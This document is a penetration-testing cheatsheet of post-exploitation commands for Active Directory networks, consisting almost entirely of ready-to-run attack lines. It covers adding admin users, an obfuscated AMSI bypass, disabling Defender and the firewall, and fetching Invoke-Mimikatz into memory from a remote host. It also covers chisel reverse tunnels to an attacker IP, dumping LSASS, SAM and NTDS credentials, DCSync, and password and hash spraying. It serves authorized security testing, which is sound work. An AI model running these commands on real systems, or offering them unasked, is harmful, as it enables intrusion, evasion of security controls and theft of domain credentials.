Active Directory Initial Access
A cheatsheet for steps after gaining initial access when performing a penetration test on Active Directory environments.
Last updated: May 4th, 2023

Preparation
Persistence
#Add user to admins
net localgroup Administrators {Domain\USER} /add
Bypassing Security
Powershell
#Language Mode
$ExecutionContext.SessionState.LanguageMode
#Execution policy
powershell -ep bypass
powershell -c {cmd}
powershell -encodedcommand $env:PSExecutionPolicyPreference="bypass"
AMSI
#powershell
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
#Invisi-Shell
RunWithPathAsAdmin.bat
RunWithRegistryNonAdmin.bat
Disabling Security
Defender
Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
Set-MpPreference -DisableOAVPrrotection $true
AMSI
Set-MpPreference -DisableScriptScanning 1
Firewall
netsh firewall set opmode disable
netsh Advfirewall set allprofiles state off
Importing Modules
Local file
Import-Module .\PowerView.ps1
..\PowerUp.ps1
In memory
powershell -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://IP/Invoke-Mimikatz.ps1')"
Enabling PS-Remoting and RDP
#remoting
Powershell -ep bypass Enable-PSRemoting -force
#rdp
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Pivoting
Local
./chisel server -p 80 --revers
Pivot Point
.\Chisel.exe client {AttackerIP}:80 R:1080:socks
Credentials
Dumping Credentials
LSASS
#Mimikatz
Invoke-Mimikatz -Command '''sekurlsa::ekeys'''
Invoke-Mimkatz -Command '''sekurlsa::logonpasswords'''
#Crackmapexec
crackmapexec smb {IP} -u {USER} -p {PASS} --lsa
#lsassy
lsassy -u {USER} -H {NTLM} -d {domain.full} {IP} --users
#procdump
Get-Process -Name LSASS
.\procdump.exe -ma {ProcNum} lsass.dump
SAM
#secretsdump
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
impacket-secretsdump -sam sam -security security -system system LOCAL
#mimkatz
Invoke-mimkatz -Command '''lsadump::sam'''
#crackmapexec
crackmapexec smb {IP} -u {USER} -p {PASS} --sam
Scheduled Tasks
Invoke-Mimikatz -Command '''vault::cred/patch'''
ntds
Dumping domain credentials from NTDS requires Domain Admin (DA) privileges.
#Mimikatz
Invoke-Mimikatz -Command '''lsadump::dsync /domain:{domain.full} /all'''
#CrackMapExec
crackmapexec smb {IP} -u {USER} -p {PASS} --ntds
#SecretDump
impacket-secretsdump {domain}/{USER}:{PASS}@{IP}
Spraying Credentials
Passwords
crackmapexec smb {IP} -d {domain} -u users.txt -p passwords.txt #spray as domain user
crackmapexec smb {IP} -u users.txt -p passwords.txt --local-auth #spray as local user
Hashes
crackmapexec smb {IP} -d {domain} -u users.txt -H hashes.txt #spray as domain user
crackmapexec smb {IP} -u users.txt -H hashes.txt --local-auth #spray as local user